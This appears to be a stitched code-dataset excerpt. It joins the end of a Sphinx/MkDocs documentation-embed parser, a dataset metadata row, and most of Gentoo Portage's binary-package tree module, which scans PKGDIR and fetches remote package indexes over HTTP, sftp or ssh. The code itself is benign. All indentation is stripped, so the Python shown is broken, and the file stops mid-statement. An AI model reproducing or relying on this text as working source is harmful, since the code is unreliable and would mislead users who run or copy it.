query_result = []
for element_id in elements_id:
if not element_id:
continue
try:
query_result = body_obj(f'#{element_id}')
if query_result:
break
except Exception: # noqa
log.info(
'Failed to query section. url=%s id=%s',
url, element_id,
)
if not query_result:
selector = f':header:contains("{escaped_section}")'
query_result = body_obj(selector).parent()
# Handle ``dt`` special cases
if len(query_result) == 1 and query_result[0].tag == 'dt':
parent = query_result.parent()
if 'glossary' in parent.attr('class'):
# Sphinx HTML structure for term glossary puts the ``id`` in the
# ``dt`` element with the title of the term. In this case, we
# need to return the next sibling which contains the definition
# of the term itself.
# Structure:
# <dl class="glossary docutils">
# <dt id="term-definition">definition</dt>
# <dd>Text definition for the term</dd>
# ...
# </dl>
query_result = query_result.next()
elif 'citation' in parent.attr('class'):
# Sphinx HTML structure for sphinxcontrib-bibtex puts the ``id`` in the
# ``dt`` element with the title of the cite. In this case, we
# need to return the next sibling which contains the cite itself.
# Structure:
# <dl class="citation">
# <dt id="cite-id"><span><a>Title of the cite</a></span></dt>
# <dd>Content of the cite</dd>
# ...
# </dl>
query_result = query_result.next()
else:
# Sphinx HTML structure for definition list puts the ``id``
# the ``dt`` element, instead of the ``dl``. This makes
# the backend to return just the title of the definition. If we
# detect this case, we return the parent (the whole ``dl``)
# Structure:
# <dl class="confval">
# <dt id="confval-config">
# <code class="descname">config</code>
# <a class="headerlink" href="#confval-config">¶</a></dt>
# <dd><p>Text with a description</p></dd>
# </dl>
query_result = parent
def dump(obj):
"""Handle API-based doc HTML."""
if obj[0].tag in ['span', 'h2']:
return obj.parent().outerHtml()
return obj.outerHtml()
ret = [
dump(clean_links(PQ(obj), url))
for obj in query_result
]
return ret, headers, section
def parse_mkdocs(content, section, url): # pylint: disable=unused-argument
"""Get the embed content for the section."""
ret = []
headers = []
if not content or not content.get('content'):
return (None, None, section)
body = content['content']
for element in PQ(body)('h2'):
headers.append(recurse_while_none(element))
if not section and headers:
# If no section is sent, return the content of the first one
section = list(headers[0].keys())[0].lower()
if section:
body_obj = PQ(body)
escaped_section = escape_selector(section)
section_list = body_obj(
':header:contains("{title}")'.format(title=str(escaped_section)))
for num in range(len(section_list)):
header2 = section_list.eq(num)
# h2_title = h2.text().strip()
# section_id = h2.attr('id')
h2_content = ""
next_p = header2.next()
while next_p:
if next_p[0].tag == 'h2':
break
h2_html = next_p.outerHtml()
if h2_html:
h2_content += "\n%s\n" % h2_html
next_p = next_p.next()
if h2_content:
ret.append(h2_content)
# ret.append({
# 'id': section_id,
# 'title': h2_title,
# 'content': h2_content,
# })
return (ret, headers, section)
| mit | -5,494,567,154,929,641,000 | 30.733967 | 145 | 0.565569 | false | 4.096903 | false | false | false |
clickbeetle/portage-cb | pym/portage/dbapi/bintree.py | 1 | 44915 | # Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ["bindbapi", "binarytree"]
import portage
portage.proxy.lazyimport.lazyimport(globals(),
'portage.checksum:hashfunc_map,perform_multiple_checksums,' + \
'verify_all,_apply_hash_filter,_hash_filter',
'portage.dbapi.dep_expand:dep_expand',
'portage.dep:dep_getkey,isjustname,isvalidatom,match_from_list',
'portage.output:EOutput,colorize',
'portage.locks:lockfile,unlockfile',
'portage.package.ebuild.fetch:_check_distfile,_hide_url_passwd',
'portage.update:update_dbentries',
'portage.util:atomic_ofstream,ensure_dirs,normalize_path,' + \
'writemsg,writemsg_stdout',
'portage.util.listdir:listdir',
'portage.util._urlopen:urlopen@_urlopen',
'portage.versions:best,catpkgsplit,catsplit,_pkg_str',
)
from portage.cache.mappings import slot_dict_class
from portage.const import CACHE_PATH
from portage.dbapi.virtual import fakedbapi
from portage.dep import Atom, use_reduce, paren_enclose
from portage.exception import AlarmSignal, InvalidData, InvalidPackageName, \
PermissionDenied, PortageException
from portage.localization import _
from portage import _movefile
from portage import os
from portage import _encodings
from portage import _unicode_decode
from portage import _unicode_encode
import codecs
import errno
import io
import stat
import subprocess
import sys
import tempfile
import textwrap
import warnings
from gzip import GzipFile
from itertools import chain
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.hexversion >= 0x3000000:
_unicode = str
basestring = str
long = int
else:
_unicode = unicode
class UseCachedCopyOfRemoteIndex(Exception):
# If the local copy is recent enough
# then fetching the remote index can be skipped.
pass
class bindbapi(fakedbapi):
_known_keys = frozenset(list(fakedbapi._known_keys) + \
["CHOST", "repository", "USE"])
def __init__(self, mybintree=None, **kwargs):
fakedbapi.__init__(self, **kwargs)
self.bintree = mybintree
self.move_ent = mybintree.move_ent
self.cpvdict={}
self.cpdict={}
# Selectively cache metadata in order to optimize dep matching.
self._aux_cache_keys = set(
["BUILD_TIME", "CHOST", "DEPEND", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS",
"LICENSE", "PDEPEND", "PROPERTIES", "PROVIDE",
"RDEPEND", "repository", "RESTRICT", "SLOT", "USE", "DEFINED_PHASES"
])
self._aux_cache_slot_dict = slot_dict_class(self._aux_cache_keys)
self._aux_cache = {}
def match(self, *pargs, **kwargs):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.match(self, *pargs, **kwargs)
def cpv_exists(self, cpv, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_exists(self, cpv)
def cpv_inject(self, cpv, **kwargs):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_inject(self, cpv, **kwargs)
def cpv_remove(self, cpv):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_remove(self, cpv)
def aux_get(self, mycpv, wants, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
cache_me = False
if not self._known_keys.intersection(
wants).difference(self._aux_cache_keys):
aux_cache = self._aux_cache.get(mycpv)
if aux_cache is not None:
return [aux_cache.get(x, "") for x in wants]
cache_me = True
mysplit = mycpv.split("/")
mylist = []
tbz2name = mysplit[1]+".tbz2"
if not self.bintree._remotepkgs or \
not self.bintree.isremote(mycpv):
tbz2_path = self.bintree.getname(mycpv)
if not os.path.exists(tbz2_path):
raise KeyError(mycpv)
metadata_bytes = portage.xpak.tbz2(tbz2_path).get_data()
def getitem(k):
v = metadata_bytes.get(_unicode_encode(k,
encoding=_encodings['repo.content'],
errors='backslashreplace'))
if v is not None:
v = _unicode_decode(v,
encoding=_encodings['repo.content'], errors='replace')
return v
else:
getitem = self.bintree._remotepkgs[mycpv].get
mydata = {}
mykeys = wants
if cache_me:
mykeys = self._aux_cache_keys.union(wants)
for x in mykeys:
myval = getitem(x)
# myval is None if the key doesn't exist
# or the tbz2 is corrupt.
if myval:
mydata[x] = " ".join(myval.split())
if not mydata.setdefault('EAPI', _unicode_decode('0')):
mydata['EAPI'] = _unicode_decode('0')
if cache_me:
aux_cache = self._aux_cache_slot_dict()
for x in self._aux_cache_keys:
aux_cache[x] = mydata.get(x, _unicode_decode(''))
self._aux_cache[mycpv] = aux_cache
return [mydata.get(x, _unicode_decode('')) for x in wants]
def aux_update(self, cpv, values):
if not self.bintree.populated:
self.bintree.populate()
tbz2path = self.bintree.getname(cpv)
if not os.path.exists(tbz2path):
raise KeyError(cpv)
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
for k, v in values.items():
k = _unicode_encode(k,
encoding=_encodings['repo.content'], errors='backslashreplace')
v = _unicode_encode(v,
encoding=_encodings['repo.content'], errors='backslashreplace')
mydata[k] = v
for k, v in list(mydata.items()):
if not v:
del mydata[k]
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
# inject will clear stale caches via cpv_inject.
self.bintree.inject(cpv)
def cp_list(self, *pargs, **kwargs):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_list(self, *pargs, **kwargs)
def cp_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_all(self)
def cpv_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_all(self)
def getfetchsizes(self, pkg):
"""
This will raise MissingSignature if SIZE signature is not available,
or InvalidSignature if SIZE signature is invalid.
"""
if not self.bintree.populated:
self.bintree.populate()
pkg = getattr(pkg, 'cpv', pkg)
filesdict = {}
if not self.bintree.isremote(pkg):
pass
else:
metadata = self.bintree._remotepkgs[pkg]
try:
size = int(metadata["SIZE"])
except KeyError:
raise portage.exception.MissingSignature("SIZE")
except ValueError:
raise portage.exception.InvalidSignature(
"SIZE: %s" % metadata["SIZE"])
else:
filesdict[os.path.basename(self.bintree.getname(pkg))] = size
return filesdict
def _pkgindex_cpv_map_latest_build(pkgindex):
"""
Given a PackageIndex instance, create a dict of cpv -> metadata map.
If multiple packages have identical CPV values, prefer the package
with latest BUILD_TIME value.
@param pkgindex: A PackageIndex instance.
@type pkgindex: PackageIndex
@rtype: dict
@return: a dict mapping each cpv to its metadata entry.
"""
cpv_map = {}
for d in pkgindex.packages:
cpv = d["CPV"]
try:
cpv = _pkg_str(cpv)
except InvalidData:
writemsg(_("!!! Invalid remote binary package: %s\n") % cpv,
noiselevel=-1)
continue
btime = d.get('BUILD_TIME', '')
try:
btime = int(btime)
except ValueError:
btime = None
other_d = cpv_map.get(cpv)
if other_d is not None:
other_btime = other_d.get('BUILD_TIME', '')
try:
other_btime = int(other_btime)
except ValueError:
other_btime = None
if other_btime and (not btime or other_btime > btime):
continue
cpv_map[_pkg_str(cpv)] = d
return cpv_map
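# Behaviour sketch (comment only, hypothetical data): if pkgindex.packages holds
# two entries for the same CPV,
#   {"CPV": "dev-libs/foo-1.0", "BUILD_TIME": "100"}
#   {"CPV": "dev-libs/foo-1.0", "BUILD_TIME": "200"}
# then _pkgindex_cpv_map_latest_build(pkgindex) keeps only the second one.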
class binarytree(object):
"this tree scans for a list of all packages available in PKGDIR"
def __init__(self, _unused=None, pkgdir=None,
virtual=DeprecationWarning, settings=None):
if pkgdir is None:
raise TypeError("pkgdir parameter is required")
if settings is None:
raise TypeError("settings parameter is required")
if _unused is not None and _unused != settings['ROOT']:
warnings.warn("The root parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is now unused. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=2)
if virtual is not DeprecationWarning:
warnings.warn("The 'virtual' parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is unused",
DeprecationWarning, stacklevel=2)
if True:
self.pkgdir = normalize_path(pkgdir)
self.dbapi = bindbapi(self, settings=settings)
self.update_ents = self.dbapi.update_ents
self.move_slot_ent = self.dbapi.move_slot_ent
self.populated = 0
self.tree = {}
self._remote_has_index = False
self._remotepkgs = None # remote metadata indexed by cpv
self.invalids = []
self.settings = settings
self._pkg_paths = {}
self._pkgindex_uri = {}
self._populating = False
self._all_directory = os.path.isdir(
os.path.join(self.pkgdir, "All"))
self._pkgindex_version = 0
self._pkgindex_hashes = ["MD5","SHA1"]
self._pkgindex_file = os.path.join(self.pkgdir, "Packages")
self._pkgindex_keys = self.dbapi._aux_cache_keys.copy()
self._pkgindex_keys.update(["CPV", "MTIME", "SIZE"])
self._pkgindex_aux_keys = \
["BUILD_TIME", "CHOST", "DEPEND", "DESCRIPTION", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS", "LICENSE", "PDEPEND", "PROPERTIES",
"PROVIDE", "RDEPEND", "repository", "SLOT", "USE", "DEFINED_PHASES",
"BASE_URI"]
self._pkgindex_aux_keys = list(self._pkgindex_aux_keys)
self._pkgindex_use_evaluated_keys = \
("DEPEND", "HDEPEND", "LICENSE", "RDEPEND",
"PDEPEND", "PROPERTIES", "PROVIDE")
self._pkgindex_header_keys = set([
"ACCEPT_KEYWORDS", "ACCEPT_LICENSE",
"ACCEPT_PROPERTIES", "CBUILD",
"CONFIG_PROTECT", "CONFIG_PROTECT_MASK", "FEATURES",
"GENTOO_MIRRORS", "INSTALL_MASK", "SYNC", "USE"])
self._pkgindex_default_pkg_data = {
"BUILD_TIME" : "",
"DEFINED_PHASES" : "",
"DEPEND" : "",
"EAPI" : "0",
"HDEPEND" : "",
"IUSE" : "",
"KEYWORDS": "",
"LICENSE" : "",
"PATH" : "",
"PDEPEND" : "",
"PROPERTIES" : "",
"PROVIDE" : "",
"RDEPEND" : "",
"RESTRICT": "",
"SLOT" : "0",
"USE" : "",
}
self._pkgindex_inherited_keys = ["CHOST", "repository"]
# Populate the header with appropriate defaults.
self._pkgindex_default_header_data = {
"CHOST" : self.settings.get("CHOST", ""),
"repository" : "",
}
# It is especially important to populate keys like
# "repository" that save space when entries can
# inherit them from the header. If an existing
# pkgindex header already defines these keys, then
# they will appropriately override our defaults.
main_repo = self.settings.repositories.mainRepo()
if main_repo is not None and not main_repo.missing_repo_name:
self._pkgindex_default_header_data["repository"] = \
main_repo.name
self._pkgindex_translated_keys = (
("DESCRIPTION" , "DESC"),
("repository" , "REPO"),
)
self._pkgindex_allowed_pkg_keys = set(chain(
self._pkgindex_keys,
self._pkgindex_aux_keys,
self._pkgindex_hashes,
self._pkgindex_default_pkg_data,
self._pkgindex_inherited_keys,
chain(*self._pkgindex_translated_keys)
))
@property
def root(self):
warnings.warn("The root attribute of "
"portage.dbapi.bintree.binarytree"
" is deprecated. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=3)
return self.settings['ROOT']
def move_ent(self, mylist, repo_match=None):
if not self.populated:
self.populate()
origcp = mylist[1]
newcp = mylist[2]
# sanity check
for atom in (origcp, newcp):
if not isjustname(atom):
raise InvalidPackageName(str(atom))
mynewcat = catsplit(newcp)[0]
origmatches=self.dbapi.cp_list(origcp)
moves = 0
if not origmatches:
return moves
for mycpv in origmatches:
try:
mycpv = self.dbapi._pkg_str(mycpv, None)
except (KeyError, InvalidData):
continue
mycpv_cp = portage.cpv_getkey(mycpv)
if mycpv_cp != origcp:
# Ignore PROVIDE virtual match.
continue
if repo_match is not None \
and not repo_match(mycpv.repo):
continue
# Use isvalidatom() to check if this move is valid for the
# EAPI (characters allowed in package names may vary).
if not isvalidatom(newcp, eapi=mycpv.eapi):
continue
mynewcpv = mycpv.replace(mycpv_cp, _unicode(newcp), 1)
myoldpkg = catsplit(mycpv)[1]
mynewpkg = catsplit(mynewcpv)[1]
if (mynewpkg != myoldpkg) and os.path.exists(self.getname(mynewcpv)):
writemsg(_("!!! Cannot update binary: Destination exists.\n"),
noiselevel=-1)
writemsg("!!! "+mycpv+" -> "+mynewcpv+"\n", noiselevel=-1)
continue
tbz2path = self.getname(mycpv)
if os.path.exists(tbz2path) and not os.access(tbz2path,os.W_OK):
writemsg(_("!!! Cannot update readonly binary: %s\n") % mycpv,
noiselevel=-1)
continue
moves += 1
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
updated_items = update_dbentries([mylist], mydata, eapi=mycpv.eapi)
mydata.update(updated_items)
mydata[b'PF'] = \
_unicode_encode(mynewpkg + "\n",
encoding=_encodings['repo.content'])
mydata[b'CATEGORY'] = \
_unicode_encode(mynewcat + "\n",
encoding=_encodings['repo.content'])
if mynewpkg != myoldpkg:
ebuild_data = mydata.pop(_unicode_encode(myoldpkg + '.ebuild',
encoding=_encodings['repo.content']), None)
if ebuild_data is not None:
mydata[_unicode_encode(mynewpkg + '.ebuild',
encoding=_encodings['repo.content'])] = ebuild_data
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
self.dbapi.cpv_remove(mycpv)
del self._pkg_paths[mycpv]
new_path = self.getname(mynewcpv)
self._pkg_paths[mynewcpv] = os.path.join(
*new_path.split(os.path.sep)[-2:])
if new_path != mytbz2:
self._ensure_dir(os.path.dirname(new_path))
_movefile(tbz2path, new_path, mysettings=self.settings)
self._remove_symlink(mycpv)
if new_path.split(os.path.sep)[-2] == "All":
self._create_symlink(mynewcpv)
self.inject(mynewcpv)
return moves
def _remove_symlink(self, cpv):
"""Remove a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink and also remove
the ${PKGDIR}/${CATEGORY} directory if empty. The file will not be
removed if os.path.islink() returns False."""
mycat, mypkg = catsplit(cpv)
mylink = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
if os.path.islink(mylink):
"""Only remove it if it's really a link so that this method never
removes a real package that was placed here to avoid a collision."""
os.unlink(mylink)
try:
os.rmdir(os.path.join(self.pkgdir, mycat))
except OSError as e:
if e.errno not in (errno.ENOENT,
errno.ENOTEMPTY, errno.EEXIST):
raise
del e
def _create_symlink(self, cpv):
"""Create a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink (and
${PKGDIR}/${CATEGORY} directory, if necessary). Any file that may
exist in the location of the symlink will first be removed."""
mycat, mypkg = catsplit(cpv)
full_path = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
self._ensure_dir(os.path.dirname(full_path))
try:
os.unlink(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
os.symlink(os.path.join("..", "All", mypkg + ".tbz2"), full_path)
def prevent_collision(self, cpv):
"""Make sure that the file location ${PKGDIR}/All/${PF}.tbz2 is safe to
use for a given cpv. If a collision will occur with an existing
package from another category, the existing package will be bumped to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 so that both can coexist."""
if not self._all_directory:
return
# Copy group permissions for new directories that
# may have been created.
for path in ("All", catsplit(cpv)[0]):
path = os.path.join(self.pkgdir, path)
self._ensure_dir(path)
if not os.access(path, os.W_OK):
raise PermissionDenied("access('%s', W_OK)" % path)
full_path = self.getname(cpv)
if "All" == full_path.split(os.path.sep)[-2]:
return
"""Move a colliding package if it exists. Code below this point only
executes in rare cases."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join("All", myfile)
dest_path = os.path.join(self.pkgdir, mypath)
try:
st = os.lstat(dest_path)
except OSError:
st = None
else:
if stat.S_ISLNK(st.st_mode):
st = None
try:
os.unlink(dest_path)
except OSError:
if os.path.exists(dest_path):
raise
if st is not None:
# For invalid packages, other_cat could be None.
other_cat = portage.xpak.tbz2(dest_path).getfile(b"CATEGORY")
if other_cat:
other_cat = _unicode_decode(other_cat,
encoding=_encodings['repo.content'], errors='replace')
other_cat = other_cat.strip()
other_cpv = other_cat + "/" + mypkg
self._move_from_all(other_cpv)
self.inject(other_cpv)
self._move_to_all(cpv)
def _ensure_dir(self, path):
"""
Create the specified directory. Also, copy gid and group mode
bits from self.pkgdir if possible.
@param path: Absolute path of the directory to be created.
@type path: String
"""
try:
pkgdir_st = os.stat(self.pkgdir)
except OSError:
ensure_dirs(path)
return
pkgdir_gid = pkgdir_st.st_gid
pkgdir_grp_mode = 0o2070 & pkgdir_st.st_mode
try:
ensure_dirs(path, gid=pkgdir_gid, mode=pkgdir_grp_mode, mask=0)
except PortageException:
if not os.path.isdir(path):
raise
def _move_to_all(self, cpv):
"""If the file exists, move it. Whether or not it exists, update state
for future getname() calls."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
self._pkg_paths[cpv] = os.path.join("All", myfile)
src_path = os.path.join(self.pkgdir, mycat, myfile)
try:
mystat = os.lstat(src_path)
except OSError as e:
mystat = None
if mystat and stat.S_ISREG(mystat.st_mode):
self._ensure_dir(os.path.join(self.pkgdir, "All"))
dest_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._create_symlink(cpv)
self.inject(cpv)
def _move_from_all(self, cpv):
"""Move a package from ${PKGDIR}/All/${PF}.tbz2 to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 and update state from getname calls."""
self._remove_symlink(cpv)
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join(mycat, myfile)
dest_path = os.path.join(self.pkgdir, mypath)
self._ensure_dir(os.path.dirname(dest_path))
src_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._pkg_paths[cpv] = mypath
def populate(self, getbinpkgs=0):
"populates the binarytree"
if self._populating:
return
pkgindex_lock = None
try:
if os.access(self.pkgdir, os.W_OK):
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
self._populating = True
self._populate(getbinpkgs)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
self._populating = False
def _populate(self, getbinpkgs=0):
if (not os.path.isdir(self.pkgdir) and not getbinpkgs):
return 0
# Clear all caches in case populate is called multiple times
# as may be the case when _global_updates calls populate()
# prior to performing package moves since it only wants to
# operate on local packages (getbinpkgs=0).
self._remotepkgs = None
self.dbapi._clear_cache()
self.dbapi._aux_cache.clear()
if True:
pkg_paths = {}
self._pkg_paths = pkg_paths
dirs = listdir(self.pkgdir, dirsonly=True, EmptyOnError=True)
if "All" in dirs:
dirs.remove("All")
dirs.sort()
dirs.insert(0, "All")
pkgindex = self._load_pkgindex()
pf_index = None
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
header = pkgindex.header
metadata = {}
for d in pkgindex.packages:
metadata[d["CPV"]] = d
update_pkgindex = False
for mydir in dirs:
for myfile in listdir(os.path.join(self.pkgdir, mydir)):
if not myfile.endswith(".tbz2"):
continue
mypath = os.path.join(mydir, myfile)
full_path = os.path.join(self.pkgdir, mypath)
s = os.lstat(full_path)
if stat.S_ISLNK(s.st_mode):
continue
# Validate data from the package index and try to avoid
# reading the xpak if possible.
if mydir != "All":
possibilities = None
d = metadata.get(mydir+"/"+myfile[:-5])
if d:
possibilities = [d]
else:
if pf_index is None:
pf_index = {}
for mycpv in metadata:
mycat, mypf = catsplit(mycpv)
pf_index.setdefault(
mypf, []).append(metadata[mycpv])
possibilities = pf_index.get(myfile[:-5])
if possibilities:
match = None
for d in possibilities:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
continue
except (KeyError, ValueError):
continue
try:
if long(d["SIZE"]) != long(s.st_size):
continue
except (KeyError, ValueError):
continue
if not self._pkgindex_keys.difference(d):
match = d
break
if match:
mycpv = match["CPV"]
if mycpv in pkg_paths:
# discard duplicates (All/ is preferred)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
# update the path if the package has been moved
oldpath = d.get("PATH")
if oldpath and oldpath != mypath:
update_pkgindex = True
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
if not oldpath:
update_pkgindex = True
else:
d.pop("PATH", None)
if oldpath:
update_pkgindex = True
self.dbapi.cpv_inject(mycpv)
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
continue
if not os.access(full_path, os.R_OK):
writemsg(_("!!! Permission denied to read " \
"binary package: '%s'\n") % full_path,
noiselevel=-1)
self.invalids.append(myfile[:-5])
continue
metadata_bytes = portage.xpak.tbz2(full_path).get_data()
mycat = _unicode_decode(metadata_bytes.get(b"CATEGORY", ""),
encoding=_encodings['repo.content'], errors='replace')
mypf = _unicode_decode(metadata_bytes.get(b"PF", ""),
encoding=_encodings['repo.content'], errors='replace')
slot = _unicode_decode(metadata_bytes.get(b"SLOT", ""),
encoding=_encodings['repo.content'], errors='replace')
mypkg = myfile[:-5]
if not mycat or not mypf or not slot:
#old-style or corrupt package
writemsg(_("\n!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
missing_keys = []
if not mycat:
missing_keys.append("CATEGORY")
if not mypf:
missing_keys.append("PF")
if not slot:
missing_keys.append("SLOT")
msg = []
if missing_keys:
missing_keys.sort()
msg.append(_("Missing metadata key(s): %s.") % \
", ".join(missing_keys))
msg.append(_(" This binary package is not " \
"recoverable and should be deleted."))
for line in textwrap.wrap("".join(msg), 72):
writemsg("!!! %s\n" % line, noiselevel=-1)
self.invalids.append(mypkg)
continue
mycat = mycat.strip()
slot = slot.strip()
if mycat != mydir and mydir != "All":
continue
if mypkg != mypf.strip():
continue
mycpv = mycat + "/" + mypkg
if mycpv in pkg_paths:
# All is first, so it's preferred.
continue
if not self.dbapi._category_re.match(mycat):
writemsg(_("!!! Binary package has an " \
"unrecognized category: '%s'\n") % full_path,
noiselevel=-1)
writemsg(_("!!! '%s' has a category that is not" \
" listed in %setc/portage/categories\n") % \
(mycpv, self.settings["PORTAGE_CONFIGROOT"]),
noiselevel=-1)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
self.dbapi.cpv_inject(mycpv)
update_pkgindex = True
d = metadata.get(mycpv, {})
if d:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
d.clear()
except (KeyError, ValueError):
d.clear()
if d:
try:
if long(d["SIZE"]) != long(s.st_size):
d.clear()
except (KeyError, ValueError):
d.clear()
d["CPV"] = mycpv
d["SLOT"] = slot
d["MTIME"] = str(s[stat.ST_MTIME])
d["SIZE"] = str(s.st_size)
d.update(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(mycpv, self._pkgindex_aux_keys)))
try:
self._eval_use_flags(mycpv, d)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(mycpv), noiselevel=-1)
self.dbapi.cpv_remove(mycpv)
del pkg_paths[mycpv]
# record location if it's non-default
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
else:
d.pop("PATH", None)
metadata[mycpv] = d
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
for cpv in list(metadata):
if cpv not in pkg_paths:
del metadata[cpv]
# Do not bother to write the Packages index if $PKGDIR/All/ exists
# since it will provide no benefit due to the need to read CATEGORY
# from xpak.
if update_pkgindex and os.access(self.pkgdir, os.W_OK):
del pkgindex.packages[:]
pkgindex.packages.extend(iter(metadata.values()))
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
if getbinpkgs and not self.settings["PORTAGE_BINHOST"]:
writemsg(_("!!! PORTAGE_BINHOST unset, but use is requested.\n"),
noiselevel=-1)
if not getbinpkgs or 'PORTAGE_BINHOST' not in self.settings:
self.populated=1
return
self._remotepkgs = {}
for base_url in self.settings["PORTAGE_BINHOST"].split():
parsed_url = urlparse(base_url)
host = parsed_url.netloc
port = parsed_url.port
user = None
passwd = None
user_passwd = ""
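			# Split an optional "user:password@" prefix and a trailing ":port"
			# out of the netloc so that only the bare host name remains.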
if "@" in host:
user, host = host.split("@", 1)
user_passwd = user + "@"
if ":" in user:
user, passwd = user.split(":", 1)
port_args = []
if port is not None:
port_str = ":%s" % (port,)
if host.endswith(port_str):
host = host[:-len(port_str)]
pkgindex_file = os.path.join(self.settings["EROOT"], CACHE_PATH, "binhost",
host, parsed_url.path.lstrip("/"), "Packages")
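			# Location of the locally cached copy of this binhost's Packages index.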
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
try:
pkgindex.read(f)
finally:
f.close()
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
local_timestamp = pkgindex.header.get("TIMESTAMP", None)
remote_timestamp = None
rmt_idx = self._new_pkgindex()
proc = None
tmp_filename = None
try:
# urlparse.urljoin() only works correctly with recognized
# protocols and requires the base url to have a trailing
# slash, so join manually...
url = base_url.rstrip("/") + "/Packages"
try:
f = _urlopen(url, if_modified_since=local_timestamp)
if hasattr(f, 'headers') and f.headers.get('timestamp', ''):
remote_timestamp = f.headers.get('timestamp')
except IOError as err:
if hasattr(err, 'code') and err.code == 304: # not modified (since local_timestamp)
raise UseCachedCopyOfRemoteIndex()
path = parsed_url.path.rstrip("/") + "/Packages"
if parsed_url.scheme == 'sftp':
# The sftp command complains about 'Illegal seek' if
# we try to make it write to /dev/stdout, so use a
# temp file instead.
fd, tmp_filename = tempfile.mkstemp()
os.close(fd)
if port is not None:
port_args = ['-P', "%s" % (port,)]
proc = subprocess.Popen(['sftp'] + port_args + \
[user_passwd + host + ":" + path, tmp_filename])
if proc.wait() != os.EX_OK:
						raise EnvironmentError("sftp failed")
f = open(tmp_filename, 'rb')
elif parsed_url.scheme == 'ssh':
if port is not None:
port_args = ['-p', "%s" % (port,)]
proc = subprocess.Popen(['ssh'] + port_args + \
[user_passwd + host, '--', 'cat', path],
stdout=subprocess.PIPE)
f = proc.stdout
else:
setting = 'FETCHCOMMAND_' + parsed_url.scheme.upper()
fcmd = self.settings.get(setting)
if not fcmd:
						raise EnvironmentError("%s is unset" % (setting,))
fd, tmp_filename = tempfile.mkstemp()
tmp_dirname, tmp_basename = os.path.split(tmp_filename)
os.close(fd)
success = portage.getbinpkg.file_get(url,
tmp_dirname, fcmd=fcmd, filename=tmp_basename)
if not success:
raise EnvironmentError("%s failed" % (setting,))
f = open(tmp_filename, 'rb')
f_dec = codecs.iterdecode(f,
_encodings['repo.content'], errors='replace')
try:
rmt_idx.readHeader(f_dec)
if not remote_timestamp: # in case it had not been read from HTTP header
remote_timestamp = rmt_idx.header.get("TIMESTAMP", None)
if not remote_timestamp:
# no timestamp in the header, something's wrong
pkgindex = None
writemsg(_("\n\n!!! Binhost package index " \
" has no TIMESTAMP field.\n"), noiselevel=-1)
else:
if not self._pkgindex_version_supported(rmt_idx):
writemsg(_("\n\n!!! Binhost package index version" \
" is not supported: '%s'\n") % \
rmt_idx.header.get("VERSION"), noiselevel=-1)
pkgindex = None
elif local_timestamp != remote_timestamp:
rmt_idx.readBody(f_dec)
pkgindex = rmt_idx
finally:
# Timeout after 5 seconds, in case close() blocks
# indefinitely (see bug #350139).
try:
try:
AlarmSignal.register(5)
f.close()
finally:
AlarmSignal.unregister()
except AlarmSignal:
writemsg("\n\n!!! %s\n" % \
_("Timed out while closing connection to binhost"),
noiselevel=-1)
except UseCachedCopyOfRemoteIndex:
